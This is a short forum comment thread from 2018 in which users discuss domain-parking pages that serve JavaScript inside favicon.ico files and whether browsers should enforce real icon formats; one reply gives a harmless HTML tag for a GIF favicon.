(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @12:52AM (2 children)
A while back I was amused to discover that the parking pages employed by domain speculators often included a favicon.ico that was full of javascript.
I'd really like to see all the browsers enforce ico-ness on favicon.ico. There's no damn good reason that a browser should load javascript from it.
Yes I Have No Bananas. [gofundme.com]
(Score: 0) by Anonymous Coward on Thursday March 01 2018, @04:12PM (1 child)
How else are we going to be able to make it do its spinny thing?
(Score: 2) by Pino P on Thursday March 01 2018, @10:18PM
<link rel="icon" href="/favicon.gif">